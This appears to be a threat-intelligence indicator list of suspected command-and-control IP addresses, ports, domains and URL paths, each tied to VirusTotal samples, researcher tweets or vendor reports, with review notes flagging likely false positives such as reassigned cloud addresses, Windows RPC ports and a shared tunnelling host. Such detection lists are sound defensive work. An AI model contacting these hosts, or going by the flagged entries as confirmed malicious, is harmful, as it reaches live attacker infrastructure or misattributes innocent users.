# Reference: https://www.virustotal.com/gui/file/56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4/detection
# Reference: https://www.virustotal.com/gui/file/68a2c4cce8c8e8cdf819d8b4f8ab88c0c851fb4ca0dcc07d562a6befc4172380/detection

95.213.145.101:443

# Reference: https://www.virustotal.com/gui/file/04eabcc001b383709ce35e3b116812382dbe1ee77ad8bd2f0da7d39d14ce3b6d/detection
# Reference: https://www.virustotal.com/gui/file/20cf0e39859e911a23db28f8890ad018ff55a3ec6e2b3b849151ce21b08f47de/detection

209.141.58.154:6363
cvc.7766.org

# Reference: https://www.virustotal.com/gui/file/1373d61f65df4004490791ade8a04490db396c2e7a248f680896c524e0f5ffd5/detection

18.158.249.75:12778

# Reference: https://www.virustotal.com/gui/file/2c91462fb50fb7d0a394317401f9044db58e652435cd3beb05ae6e0a0184d63a/detection

http://66.70.238.65

# Reference: https://twitter.com/drb_ra/status/1552819839382835202

167.71.88.90:443
/utag/lbg/main/prod/utag.15.js

# Reference: https://twitter.com/drb_ra/status/1553373644386189312

192.9.244.42:443
/trader-update/history&pd=/

# Reference: https://www.virustotal.com/gui/file/0411b1c23bfb671d36136760706cf85a11af5cfd16f8de47a330a8ca915f1eef/detection

64.52.80.168:7778

# Reference: https://twitter.com/StopMalvertisin/status/1554677296472399872

78.85.17.88:8443

# Reference: https://twitter.com/StopMalvertisin/status/1554738107001765888

78.85.17.88:9991

# Reference: https://www.virustotal.com/gui/file/9c69b39140e43602c4040ab7e9fadf3d74fdc4f9f92cddd2586e6a24fe8c70e4/detection

sky-titans.net

# Reference: https://www.virustotal.com/gui/file/f506dc1b194dfd25df0dfc2490e53138400e0fd5147e79878e878168b57d8531/detection

http://185.156.43.249
185.156.43.249:5544

# Reference: https://www.virustotal.com/gui/file/e451243cc7e2ff3b82a99501ae6e0d3461d7c30e3ff23d71a70b9e5afe6400cf/detection

185.156.43.249:443

# Reference: https://www.virustotal.com/gui/file/ab19c9ee6c97509b12adae6bc4c3e2f3aeb295d6bb6dc39bfc4caab9d5c02c8e/detection

185.156.43.249:8088

# Reference: https://www.virustotal.com/gui/file/463e0ad8bd88738a3ad56095fd6c1df32db01b9194fe0c240e484c4ec877814e/detection

185.156.43.249:4433

# Reference: https://www.virustotal.com/gui/file/5887040b238982d1ec370dec2dfc2f20a3b358e1f03aa30e1c82f9ed46d0ef9a/detection
# Reference: https://www.virustotal.com/gui/file/7ddc9bbf5a0cb96e1a3eabd57c7a3c9529c99d47828c52782cc41f9479110894/detection

hjit.ru

# Reference: https://twitter.com/StopMalvertisin/status/1555461886711590913
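# Reference: https://www.virustotal.com/gui/file/50cd4fbf0ebfe65fc135523fda1525a32dc50764748f863193da22d4616c8666/detection
# Note (review): the ec2-54-91-111-47 hostname below is the provider-generated name for the same address, 54.91.111.47, so it is not an independent indicator; cloud addresses are reassigned, so confirm the current tenant before treating a match as confirmed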

54.91.111.47:4455
autodontreplyservices.com
ec2-54-91-111-47.compute-1.amazonaws.com

# Reference: https://twitter.com/drb_ra/status/1556069100820086785

96.31.77.61:8888

# Reference: https://www.virustotal.com/gui/file/2932baac30e642651f27b4b7c6f77b9122742f49866da5160e9db776b1e832e9/detection

185.100.65.237:4447

# Reference: https://www.virustotal.com/gui/file/bc556718de6fc8d375c7a4121e7d68632caf1fd5439cfd4d9c48d21e092476e6/detection

bfparty.org

# Reference: https://twitter.com/malwrhunterteam/status/1559881926688784385
# Reference: https://www.virustotal.com/gui/file/16b4a6fec76b452f77a6832871ff2e906d673e557a0e6c2673fc952181d1319b/detection

buckotx.s3.amazonaws.com

# Reference: https://twitter.com/malwrhunterteam/status/1559902576757424130
# Reference: https://www.virustotal.com/gui/file/6634cd044332d28d153519298fd0f68590d966d1c970a80d5a6462fd5a9734ec/detection

azistcool.linkpc.net

# Reference: https://www.virustotal.com/gui/file/eca7dc19194ed6de874c9591106be959f0b4f6ec250f3617634b61aa13639a10/detection

finxiio.com

# Reference: https://twitter.com/pollo290987/status/1560155917341130752
# Reference: https://www.virustotal.com/gui/file/737d0d04046e490f3e69e8ab944487d9bd78d77d6be943811949f00f6b89bdd7/detection

sodkvsodkv.facturas.stuff-4-sale.us

# Reference: https://twitter.com/malwrhunterteam/status/1560584179955314688
# Reference: https://www.virustotal.com/gui/file/e6433b54eeeca4efa18f93bd3d90339114edd040a16083e6d5be17f7f0f655e3/detection

shipminttracking.net

# Reference: https://www.virustotal.com/gui/file/b6173bfaf49c806340d65cd48b9f368a5153c3116c2f724e69cf91ea324563d3/detection

137.184.88.94:9001

# Reference: https://twitter.com/malwrhunterteam/status/1560635393971589122
# Reference: https://www.virustotal.com/gui/ip-address/34.80.234.86/relations
# Reference: https://www.virustotal.com/gui/ip-address/83.69.236.3/relations
# Reference: https://www.virustotal.com/gui/file/de55f77361210aeacf9a5989479c0ad790d31633d6899100fa42828156fc79ed/detection
# Reference: https://www.virustotal.com/gui/file/7596564139a66bb4e164cfcae16940e3c4c7909cbbaae1c60aa4a91061a1e54d/detection

iisn.at
iiso.in
ilsvt.co
looi.io
lslb.in
sisidra.ws
tls-i.in
tls-n.in
tornado.ws

# Reference: https://twitter.com/drb_ra/status/1558253131968008192

65.20.81.201:443

# Reference: https://twitter.com/drb_ra/status/1558431403385257985

anmal.ddns.net

# Reference: https://twitter.com/drb_ra/status/1560810734673661952

164.132.138.128:443
91.194.3.36:443

# Reference: https://www.virustotal.com/gui/file/4cc1b6c78cb2a820743f20316044eec68bfeb25dee7615954de27847cde26229/detection

18.219.180.158:8080
phisher.nastydomain.com

# Reference: https://www.virustotal.com/gui/file/f2e4736e8c1776a983021311ff48404d78f02de5677b187828e7b40544e33cb7/detection

http://35.158.114.105

# Reference: https://www.virustotal.com/gui/file/7ce2a0f058befe3034a1bf27d5aa8c7cdcd79e1a0064bb4e83cb179097fb3b8d/detection

webshare01.onlinesecure365.com

# Reference: https://twitter.com/drb_ra/status/1563141828396056578

d2gzdrbvjbbq9z.cloudfront.net

# Reference: https://twitter.com/drb_ra/status/1563142062798938112

13.234.39.14:443

# Reference: https://www.virustotal.com/gui/file/16007ea6ae7ce797451baec2132e30564a29ee0bf8a8f05828ad2289b3690f55/detection

http://45.89.125.189

# Reference: https://www.virustotal.com/gui/file/454add1bfdc98b944ed97984f1771ec09c9a4c869e3fb6936573d0db8a83ac30/detection

82.2.66.222:21

# Reference: https://www.virustotal.com/gui/file/1da0ce0810952354a5e288a3dd6690338228933c5ff726d317c4748a4322e6dd/detection

82.2.66.222:4444

# Reference: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/
# Reference: https://otx.alienvault.com/pulse/630f67c49a28f85f26b91f5a

apiregis.com
updatesagent.com
xmlschemeformat.com

# Reference: https://twitter.com/drb_ra/status/1564765008503967749

3.121.201.91:8080

# Reference: https://www.virustotal.com/gui/file/74a75862bd3fb1df2110cfa2f4de6a56c6370c4aba30df4c6b98ea3346d6366a/detection
# Reference: https://www.virustotal.com/gui/file/0439db34ebaca953064a84b4976b5d0533076594f4d92b6b0d7829988845dbca/detection

pc2.heapack.com

# Reference: https://twitter.com/drb_ra/status/1566577843886227459

54.39.238.131:1335

# Reference: https://www.virustotal.com/gui/file/8e698623199611102ffb0e72e86d76c9a2178e4efb3e7346bcfb37269074e6bc/detection
# Reference: https://www.virustotal.com/gui/file/c8117e93fa43454f1bfd6ecd0324dd08f55beae4258e63d484f72b6aafbdf40d/detection

huntsman-dfir.tech
malware-analysis.huntsman-dfir.tech

# Reference: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/
# Reference: https://www.virustotal.com/gui/file/c23e61db0e74e6d48ba27f17461abc88c700e0a386ffdbd4c1a1571ebf630d4f/detection

i-development.one

# Reference: https://twitter.com/malwrhunterteam/status/1567135765569671168
# Reference: https://www.virustotal.com/gui/file/518a0d736b7d9e015548c7bf2eb3b9692817caf67acc20869f68adc5af5b7200/detection

scorpio-cdn.com

# Reference: https://twitter.com/malwrhunterteam/status/1567146303674585090
# Reference: https://www.virustotal.com/gui/file/78cc518559f2348e4c959848d0c2671e96d16c166db0aaa7633dd67ab6bc58ef/detection
# Reference: https://www.virustotal.com/gui/file/bcb1fed53879768a3fa7b6d7f77695e9f2971a20e2cbb5df0b2a0a83c3088946/detection

http://168.119.107.156

# Reference: https://www.welivesecurity.com/2022/09/06/worok-big-picture/
# Reference: https://otx.alienvault.com/pulse/63174ac2e0c9d93ffa7e32f5

suhypercloud.org
travel-commercials.agency
airplane.travel-commercials.agency
bus.travel-commercials.agency
fly.travel-commercials.agency
train.travel-commercials.agency
central.suhypercloud.org
customer.suhypercloud.org
srv.suhypercloud.org

# Reference: https://twitter.com/drb_ra/status/1566942796153511936

185.64.247.240:4443

# Reference: https://www.virustotal.com/gui/file/be746568cc611f15da95184f3080f2d976f9c45e09b77e10d5916e99b2ab5555/detection

85.209.179.63:4444

# Reference: https://www.virustotal.com/gui/file/93f73b12dae2cc2629bd301941a995e4833c10e27a988c929f21257edbef14c3/detection

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/e3416839a6b0aad2e470b8ab7c2b27c8a8919686ffbdbf5f1496a3edebb22f8f/detection

82.167.230.163:7331

# Reference: https://www.virustotal.com/gui/file/d7a5fbc4865a624221fc15de663c4abe9628865ffda7fdf77a350ac67e57f82e/detection

20.224.161.53:1000

# Reference: https://www.virustotal.com/gui/file/a8e002532b37acf502145cff1f6485877c524a6075bbcae537c758ee22bb3900/detection

162.241.224.143:9001

# Reference: https://www.virustotal.com/gui/file/31b9785480154d9def6cefb099b5dd32716634a9cfa4baf471c2164ef6f58028/detection

209.25.141.181:20960

# Reference: https://www.virustotal.com/gui/file/9fad60dd882e26b555f5127ffc7b70326f57ab84271185bbbf469e5eb1ed5e4b/detection

5.183.95.123:443

# Reference: https://twitter.com/malwrhunterteam/status/1567887497090285569
# Reference: https://www.virustotal.com/gui/file/2e551962c5d2641f8ff5e35156e7b2f1a02f6c0c29c4066692a7e14541f5ac93/detection

185.43.7.204:443

# Reference: https://twitter.com/malwrhunterteam/status/1568190202266386434
# Reference: https://www.virustotal.com/gui/file/bc6202d58b5ed72e9b23b617f5a3d2888169f471af884b573d67e8a58fe5d4c5/detection

bashamed.org
zeytoonict.com

# Reference: https://twitter.com/malwrhunterteam/status/1568198491226226688
# Reference: https://www.virustotal.com/gui/file/8ae18fc31866c3a35ede249b97457598e78cb6a0988df1dd58b9ddb1f3e88c05/detection

woo097878780.000webhostapp.com

# Reference: https://twitter.com/drb_ra/status/1568421255627550720

173.82.212.78:443

# Reference: https://twitter.com/StopMalvertisin/status/1568529585893175296
# Reference: https://twitter.com/StopMalvertisin/status/1568529591991693313

http://185.45.192.208
http://185.82.202.121

# Reference: https://www.virustotal.com/gui/file/2062108b6af5401e11ecc1666906745f499449e3e80bd3e439b6a0132afec3cb/detection
# Reference: https://www.virustotal.com/gui/file/bb5afa2cc56710ed33c78dbf56120628cc9b3f120d7847a92efd86a19a14e573/detection

spoilgrey.com

# Reference: https://twitter.com/malwrhunterteam/status/1570430443983441921
# Reference: https://www.virustotal.com/gui/file/917c20c5de91f02122a2cfe9d97c70294b1a38d1c1aead5dd6765a39621086f4/detection

d23grfsvusxgzv.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/2d7613b00471b735332dd5ba14bfa05da3d04c79e34304a4419244ff60ee3017/detection

irc.us.org

# Reference: https://twitter.com/malwrhunterteam/status/1570008286417813506
# Reference: https://www.virustotal.com/gui/file/aabe271f846165939b72213794ac12099bac575b250c71cce1f80919c76c0ba9/detection

test.dfir.com.au

# Reference: https://twitter.com/malwrhunterteam/status/1571064193956319235
# Reference: https://www.virustotal.com/gui/file/2de7c6cbb107b72c67711008a704284f24a0e7294316109b87bb6ff1b06fe397/detection

host1849145.hostland.pro

# Reference: https://twitter.com/StopMalvertisin/status/1571136090760966144
# Reference: https://www.virustotal.com/gui/file/797e74d61badfcd0b2fc15b467cc5aee5eeec93b1ac41ccf08749740f10ae475/detection
# Reference: https://www.virustotal.com/gui/file/33b77459b3b88949e2110f81c77c5024f2701a5bfa580f275da9b8f2316c2c73/detection

142.93.204.150:4433

# Reference: https://twitter.com/abuse_ch/status/1572833978184499201
# Reference: https://tria.ge/220921-g1gwdabadl

149.57.171.69:8080

# Reference: https://www.virustotal.com/gui/file/59d451917630e02e1c38ce6485e187f403279abc0f1afc744f82dd3b9c4a4ccb/detection

6-express.ch

# Reference: https://www.virustotal.com/gui/file/8c785cfe27ba43be28feb28ea9f056a65cebe62abd652f11b82196d819853d37/detection

workplaceanddiversity.com
updatepkg8.workplaceanddiversity.com

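# Reference: https://twitter.com/malwrhunterteam/status/157361918168947507
# NOTE(review): the status ID above has 18 digits where the other 2022 tweet references in this file have 19; it looks truncated - confirm against the original tweet.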
# Reference: https://www.virustotal.com/gui/file/b2de5e474c1a933468603795e736d7d7dfdc8e13b5f14e6fba7e9849298cc8bb/detection

105.108.117.187:21000
105.108.198.242:21000
105.109.159.46:21000
154.246.109.149:21000
154.246.113.83:21000
154.246.146.88:20000
154.246.234.136:21000
154.247.9.173:21000
197.207.8.74:21000
webjava.mywire.org

# Reference: https://www.virustotal.com/gui/file/8fa32222a5317a6734271299d86c84b0041c0d41959f2b9a76b00af92818cda8/detection

104.248.32.159:443

# Reference: https://twitter.com/MichalKoczwara/status/1574103025693622277

/PoshC2.bat

# Reference: https://twitter.com/malwrhunterteam/status/1574440704838963201
# Reference: https://twitter.com/StopMalvertisin/status/1574442449983836160
# Reference: https://www.shodan.io/host/176.124.219.223
# Reference: https://www.virustotal.com/gui/file/59d86574bc99b593abdcf563628af93581eb109748951cac649b3076c70f215d/detection
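# Reference: https://www.virustotal.com/gui/file/1cb4c0402251b5ed56c0a7f6e4d3c4ede4d5a34ece829077a0e2dd3d2523fce0/detection
# NOTE(review): 135 is the Windows RPC endpoint mapper and 49664-49682 fall in the default Windows dynamic RPC port range; these entries may reflect the host's exposed services from the Shodan listing rather than confirmed C2 listeners - verify against the samples.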

176.124.219.223:135
176.124.219.223:49664
176.124.219.223:49665
176.124.219.223:49666
176.124.219.223:49667
176.124.219.223:49668
176.124.219.223:49670
176.124.219.223:49682

# Reference: https://www.virustotal.com/gui/file/8cdf57dda39f0a10b6f176bc623faba45ed0540d520876b4b67828846f9d7cdb/detection

172.93.181.204:8000

# Reference: https://twitter.com/malwrhunterteam/status/1575453078987366400
# Reference: https://www.virustotal.com/gui/file/558334aa04310114c9433cbd33f44bb35b05f6bd0a29be944adc086215f3b65b/detection

bypass.today

# Reference: https://twitter.com/drb_ra/status/1577506068212719618

213.226.123.157:9197

# Reference: https://twitter.com/drb_ra/status/1570773343258697729

http://188.166.116.129

# Reference: https://twitter.com/drb_ra/status/1573681067541798912

188.166.116.129:6969

# Reference: https://twitter.com/drb_ra/status/1576372562958991361

45.14.224.190:443

# Reference: https://twitter.com/RedPacketSec/status/1577046901194690585

103.27.203.197:444

# Reference: https://twitter.com/RedPacketSec/status/1577046902310375428

18.132.247.80:443

# Reference: https://www.virustotal.com/gui/ip-address/216.240.130.72/relations
# Reference: https://www.virustotal.com/gui/file/8b9c05a1e4a3b701bf8d2229a70bc83cc25b975ab16dbc2a2d0f98d319eeae0a/detection

gamesnetb.com
443.gamesnetb.com
443.onedriveup.today
disk.camdvr.org
disk.casacam.net
netdisk.780wow.com
netdisk.ddnsgeek.com
pan20220109.onedriveup.today
rack.780wow.com
rockdisk.ddnsfree.com

# Reference: https://www.virustotal.com/gui/file/fc47b1c0aeb5f6b19af07329a889e39640c626b89ef2e58fe1ec2f0742b0810b/detection

37.0.14.202:3030

# Reference: https://twitter.com/drb_ra/status/1582887247170351105

185.64.247.59:4443

# Reference: https://twitter.com/malwrhunterteam/status/1583197120105877504
# Reference: https://www.virustotal.com/gui/file/5d2f1d7a4f8cda18fd9103e686c811f8e60afc40d3b97b4e05e1394b1c01182c/detection

s5grdzk4uv23llh6ahlx2n2d2s4elzrdrok5rkf7qnhgytud2cqiy6yd.onion.ws
/whatnoplease

# Reference: https://twitter.com/drb_ra/status/1584160635729809410

c2.nathancoats.com

# Reference: https://twitter.com/drb_ra/status/1584355435984785408

192.9.169.86:443

# Reference: https://twitter.com/drb_ra/status/1584886337282375680

adpworkforce.app

# Reference: https://twitter.com/drb_ra/status/1585613063952138240

45.137.117.200:443

# Reference: https://twitter.com/h2jazi/status/1586128535004987392
# Reference: https://www.virustotal.com/gui/file/f7c3ca865baa3553ab44e1cd8f6cf0421a2e4bc12d228abda1296069a07d86b4/detection

d1codu14p1gdvw.cloudfront.net

# Reference: https://twitter.com/drb_ra/status/1586705416779612165

116.203.51.117:443

# Reference: https://www.virustotal.com/gui/file/1b82739880e1851d032b09de787033bd19135c8496124cd505b32afe4212b7b0/detection

http://89.22.233.149

# Reference: https://twitter.com/malwrhunterteam/status/1587571283159547906
# Reference: https://www.virustotal.com/gui/file/ab2f0ffb3a1f762f0de9bc5bd8b529232729f1f790eb07c55097ad3eb204d061/detection

192.46.211.76:443
192.46.211.76:8000
lelouch.tk
a.lelouch.tk

# Reference: https://twitter.com/malwrhunterteam/status/1588580672121470977
# Reference: https://www.virustotal.com/gui/file/ae6c02ba554be6dcda3610e8048d0649418f96ed0a8e2cda0a9d27ed4a46ddcc/detection

45.141.215.215:8080
sisal-policy-italy.duckdns.org
sisal-updater.duckdns.org

# Reference: https://twitter.com/drb_ra/status/1588154272402870272

74.208.135.130:443

# Reference: https://twitter.com/sysk1ll3r/status/1589615455396040706
# Reference: https://www.virustotal.com/gui/file/aaa97571b8c811109ab623de66ca34027193e0e78835abd187f6c5750fc1c6d2/detection
# Reference: https://www.virustotal.com/gui/file/0976d94f317fc0050d2e6250b327044b49320fd9ab283d6d9b3d192ef2ff328f/detection

http://195.133.40.130
http://20.106.255.48

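# Reference: https://twitter.com/drb_ra/status/1589958958869090304
# NOTE(review): both entries below are path-only (no host) and the path resembles a public JavaScript library asset, so a match on the path alone may be benign - triage together with the destination host.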

/babel-polyfill/6.3.14/polyfill.min.js
/babel-polyfill/6.3.14/polyfill.min.js=/

# Reference: https://twitter.com/r3dbU7z/status/1590276341106356229

http://45.154.98.151
45.154.98.151:443
45.154.98.151:777
niva.linkpc.net

# Reference: https://twitter.com/ScumBots/status/1591185331474374675
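# Reference: https://www.virustotal.com/gui/file/8f1e1aa4ffded36e953eaf3b679fca21bffc5ca1c837c03fe97ba9ecf93b39fa/detection
# NOTE(review): port 23235 also appears in the hostname jeffersonfilho-23235.portmap.host listed in this file, so this address is presumably a shared tunnelling-service endpoint; keep the port qualifier so other users of the same IP are not flagged - confirm.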

193.161.193.99:23235

# Reference: https://twitter.com/ScumBots/status/1590743667064586241
# Reference: https://www.virustotal.com/gui/file/6de48c8c9301b869034fab854c3d518810c2bcc0957093b4739ef0e16912fc3c/detection

jeffersonfilho-23235.portmap.host

# Reference: https://twitter.com/drb_ra/status/1591227919493373952

http://45.93.31.122
/adServingData/PROD/TMClient/6/8736/

# Reference: https://www.virustotal.com/gui/file/d2432ae81241cd0041c23c81b7ddb874ac29b8cc77025a44b41c249a41f3a094/detection

193.33.195.152:3000

# Reference: https://twitter.com/malwrhunterteam/status/1592231757461741569
# Reference: https://www.virustotal.com/gui/file/af3b595215fe40422c0d4a10bbfc2d0e609edf315fbcb372951eea626f58f41f/detection

3mtbusa.com

# Reference: https://twitter.com/drb_ra/status/1593418944332894209

microsoftonedrive.online

# Reference: https://twitter.com/drb_ra/status/1593779349982879744

emergency-coms.com
cc.emergency-coms.com

# Reference: https://twitter.com/luc4m/status/1595105175492087810
# Reference: https://www.virustotal.com/gui/file/49d1d6bfc32f81df0fa87f715be219c26de59067ff1c6e17a2564598900a2a3c/detection

http://146.70.87.186

# Reference: https://twitter.com/malwrhunterteam/status/1594818792084971523
# Reference: https://www.virustotal.com/gui/file/0fa2e2f524101e9c5e911e193e7fb145463c0c2a72a5fb14f8f11a8ae3a18593/detection

201.121.29.197:81
201.121.68.116:81

# Reference: https://twitter.com/drb_ra/status/1595767943841058817

159.65.92.230:443

# Reference: https://github.com/conexioninversa/MalwareIntel/blob/main/C2_Posh.txt

http://146.59.201.131
109.234.36.5:443
109.248.6.221:443
132.145.106.12:8443
146.190.86.212:4443
159.223.20.20:443
159.69.180.8:443
165.22.119.30:443
178.20.47.220:443
184.72.153.18:443
185.193.126.28:443
192.18.141.199:443
193.36.15.251:443
20.218.128.59:443
3.65.198.167:443
3.72.176.74:443
34.235.5.141:443
44.192.81.16:443
45.137.117.200:8443
62.182.159.147:443
79.51.197.75:443
94.130.106.165:443
95.164.87.82:443
95.213.145.101:443
98.142.143.13:8000

# Reference: https://github.com/conexioninversa/MalwareIntel/blob/main/C2_PowerSploit.txt

http://190.157.37.153
http://82.157.181.130
http://88.91.32.192
18.209.76.109:8080

# Reference: https://twitter.com/malwrhunterteam/status/1596217071742128128
# Reference: https://www.virustotal.com/gui/file/74712e4b42600980566b6dc10df3fb2f63a7daefc3e28abc591d222e3fe0ece0/detection

161.49.96.244:13373
gsismo.com

# Reference: https://www.virustotal.com/gui/file/71459112f7bd7cda5d383db74555399740c532064537aa876c45657438381ccf/detection

http://62.204.41.222

# Reference: https://twitter.com/ScumBots/status/1598210368408543233
# Reference: https://www.virustotal.com/gui/file/eee29a4a94a23810cab689c09e4a83362278a344f3364ee371defcdd96c8e195/detection

154.12.244.1:46969

# Reference: https://twitter.com/ScumBots/status/1596161656874221568
# Reference: https://www.virustotal.com/gui/file/8198e99eec93b479880e3a05a3148fb6f849bd1a678d9d1589582e9255553bdc/detection

194.163.157.141:4444
furfag.xyz

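# Reference: https://twitter.com/drb_ra/status/1598305446137589760
# NOTE(review): 159.223.20.20:443 is also listed in this file under the conexioninversa C2_Posh.txt reference; one of the two entries is redundant for matching.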

159.223.20.20:443

# Reference: https://twitter.com/drb_ra/status/1598474873675866114
# Reference: https://www.virustotal.com/gui/file/44cbf54f2bf9d02e326f24bc3d0bbf5d6e070d17407afd404acdca2366da643c/detection

http://34.235.5.141
evilredteamthings.com

# Reference: https://twitter.com/xorJosh/status/1598646907802451969

193.201.9.101:11196

# Reference: https://twitter.com/malwrhunterteam/status/1599836594844098560
# Reference: https://www.virustotal.com/gui/file/5002bad1d29e3bb13f1c52be33796963564e639852ecf347503eb1fc2c8c4a89/detection

merry-froyo-94e086.netlify.app

# Reference: https://twitter.com/ScumBots/status/1600165757303783425
# Reference: https://www.virustotal.com/gui/file/68493c8e28d56058cc5fb345c037f37ba97a738f15e78e3fe8e94749cb809d40/detection

95.90.54.183:8080

# Reference: https://twitter.com/ScumBots/status/1600168337576808452
# Reference: https://www.virustotal.com/gui/file/e69cc36ecb2e75c8f9b969eb6f3cf37a371e33375f1b466b47e0e261340a9367/detection

95.90.54.183:8

# Reference: https://twitter.com/ScumBots/status/1600228665178132518
# Reference: https://twitter.com/ScumBots/status/1600228737768951838
# Reference: https://www.virustotal.com/gui/file/341f194d9ccc811fcc3995eee085f66e299a17aa2272b8a91b3093de281bfac9/detection
# Reference: https://www.virustotal.com/gui/file/d1644309bcecc22c100bd188d2b8ae6072d89113378c90e131672de97c8e49cc/detection

209.165.201.17:4444

# Reference: https://www.virustotal.com/gui/file/e56cbac2134c6bcb67cf25428f8d7db959d341a26d81e4eb4f9f77e7186e5906/detection

http://155.133.23.244

# Reference: https://twitter.com/malwrhunterteam/status/1601189140305186817
# Reference: https://www.virustotal.com/gui/file/d1a4a68b2dc8689752a51b596e383f380c974593f4478fee79f0cac6627f2ae8/detection

20.172.137.101:8080

# Reference: https://www.virustotal.com/gui/file/b1b86bdefc10d4f3fb18fd2d6fcc4cf9e8ed73c108c772e0870f3545731cb3f5/detection
# Reference: https://www.virustotal.com/gui/file/4a614fbe0450a785de13f100465b8212d03e8f358676d2d8e54022bf991e1142/detection
# Reference: https://www.virustotal.com/gui/file/3fbb76f59491281628c762e16b1f07724f1dccf207b13aff3b6ec405143fb7b5/detection

jobbfinderrr.xyz
xvfghtyua.000webhostapp.com

# Reference: https://www.virustotal.com/gui/file/46ed79dc34684fe4e0eb948bb4c8804fa9422a2b5774ee122fc7a24ef67d09d1/detection

3.142.141.21:8080

# Reference: https://www.virustotal.com/gui/file/593c91faf0605f937b676f0f6aea7324fd0800fcf630ca0c591aa18fa2c97238/detection
# Reference: https://www.virustotal.com/gui/file/427d31a39e30e238772ec5c7a7e5f21456455ca2c14ed33c3b637ddaafdf8d36/detection

3.142.141.21:30303

# Reference: https://www.virustotal.com/gui/ip-address/3.142.141.21/relations

ms-security-desk.cf

# Reference: https://www.virustotal.com/gui/ip-address/18.222.107.105/relations
# Reference: https://www.virustotal.com/gui/file/474a83ab9e606773f64bce7d639dae8a56f262af53ef0e7ee0d5be2bc6695d88/detection

18.222.107.105:1335

# Reference: https://twitter.com/ScumBots/status/1602702148290154496
# Reference: https://www.virustotal.com/gui/file/907610dddd18d371a814dafb80bf5fae3743cf2867b2f31590263f7c9c9114dc/detection

212.86.109.121:443

# Reference: https://twitter.com/ScumBots/status/1602858497409966080
# Reference: https://www.virustotal.com/gui/file/7a35b26ca56a9c4d04af40eded45352c5d1b8e1d8118a1dc26e5a5a80a1114e2/detection

18.229.146.63:16497

# Reference: https://twitter.com/ScumBots/status/1603359300478533632
# Reference: https://www.virustotal.com/gui/file/47a14e36512627b8f66d448935f547a8cd117a6761385fb178303795084cbf11/detection

54.37.161.92:22

# Reference: https://twitter.com/ScumBots/status/1603361811658596352
# Reference: https://www.virustotal.com/gui/file/ac0ac1aa9a3ca544a1218c836e42e858ec0e10444c72c09b2f1f9191ebfad636/detection

34.126.164.120:22

# Reference: https://twitter.com/ScumBots/status/1604028706950889474
# Reference: https://www.virustotal.com/gui/file/d0a7bd25b378287585c36b96d279de61374155a26916ea18509754644ad7cd03/detection

34.126.109.143:22

# Reference: https://www.virustotal.com/gui/file/d74ba5885f7659e58ae5a3d739ad7cc2be61917c13fd4ab4637a14a9f40851ae/detection

mamonci.ga
jacksonmuhammad990.duckdns.org

# Reference: https://www.virustotal.com/gui/file/9e9ed31263978322e1dcfb1e30e9e0958d7ba1e4e32b0e2d6286861ecd1c9c58/detection

http://185.29.10.41

# Reference: https://twitter.com/ScumBots/status/1604436389726142464

172.245.92.207:443

# Reference: https://twitter.com/ScumBots/status/1604884348305539075
# Reference: https://www.virustotal.com/gui/file/b485020628c5eb8f6964f79e89a9a3f522197210e300e820fc796763108a8ddf/detection

35.240.198.92:22

# Reference: https://twitter.com/ScumBots/status/1604891894366015488
# Reference: https://www.virustotal.com/gui/file/c071dcff79e062d648272664093f9886070e2df9b91ccfcf4332d296341fd05e/detection

20.226.72.14:22

# Reference: https://twitter.com/r3dbU7z/status/1604992480830967808

http://104.238.149.39

# Reference: https://twitter.com/malwrhunterteam/status/1604964169023115264
# Reference: https://www.virustotal.com/gui/file/b3cb1b5e3d828e25d9802cc536dd89e347bb70528285e1bf1e1acf123fb4659e/detection

letshackit.shohos.com

# Reference: https://www.virustotal.com/gui/file/e019717ced89e11e199b1480a5f3d85cda81181141f906093f39e0d2a13d9c5c/detection

3.129.187.220:11830
3.131.147.49:11830
3.133.207.110:11830
3.136.65.236:11830
3.138.180.119:11830
3.22.15.135:11830

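# Reference: https://www.virustotal.com/gui/file/e724b87d50e009d1f60874451295724dff48d10231a9e5cc9c124acf962bf97d/detection
# NOTE(review): 11.0.0.0/8 is US DoD address space that some networks reuse internally, and the 11.23.33.44 pattern looks like a placeholder from the sample's configuration rather than live C2 - confirm, and expect false positives where 11/8 is used internally.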

11.23.33.44:10225

# Reference: https://www.virustotal.com/gui/file/cd3dfff05a8b3134ebddd96e081465ed1f2fa847511976bc2eebed34eb114ae5/detection

3.22.53.161:13575

# Reference: https://twitter.com/VirITeXplorer/status/1605592225559089152
# Reference: https://twitter.com/VirITeXplorer/status/1605592378110119936

34.116.134.195:49751

# Reference: https://twitter.com/MichalKoczwara/status/1605658798437199872

62.182.159.147:8000

# Reference: https://twitter.com/ScumBots/status/1606044491546337280

195.58.39.167:8080

# Reference: https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/

140.82.52.35:443
192.248.176.138:443
216.128.146.38:443
217.69.10.255:22
45.32.144.71:443
45.76.246.112:22

# Reference: https://twitter.com/malwrhunterteam/status/1608154920011825155
# Reference: https://www.virustotal.com/gui/file/6d4bc2f881d3b7c9df405e5550268db7382dd06e3451e0815cf365a6ef25ff90/detection

http://193.149.187.234

# Reference: https://twitter.com/pmelson/status/1609602465015414786
# Reference: https://www.virustotal.com/gui/file/4f3a7247427aa4cd1995b6ef6b41031c0e7c53e7fbf015c5bcc8a8195bc62b3c/detection
# Reference: https://www.virustotal.com/gui/file/2573edb9592715b7e0048056279d6d707c959fe815148f733e60b4eb0fca3aea/detection

ahoravideo-blog.com
ahoravideo-blog.xyz
ahoravideo-cdn.com
ahoravideo-cdn.xyz
ahoravideo-chat.com
ahoravideo-chat.xyz
ahoravideo-endpoint.com
ahoravideo-endpoint.xyz
ahoravideo-schnellvpn.com
ahoravideo-schnellvpn.xyz
bideo-blog.com
bideo-blog.xyz
bideo-cdn.com
bideo-cdn.xyz
bideo-chat.com
bideo-chat.xyz
bideo-endpoint.com
bideo-endpoint.xyz
bideo-schnellvpn.com
bideo-schnellvpn.xyz
cesareurope.com
fairu-blog.com
fairu-blog.xyz
fairu-cdn.com
fairu-cdn.xyz
fairu-chat.com
fairu-chat.xyz
fairu-endpoint.com
fairu-endpoint.xyz
fairu-schnellvpn.com
fairu-schnellvpn.xyz
k6027.eu
privatproxy-blog.com
privatproxy-blog.xyz
privatproxy-cdn.com
privatproxy-cdn.xyz
privatproxy-chat.com
privatproxy-chat.xyz
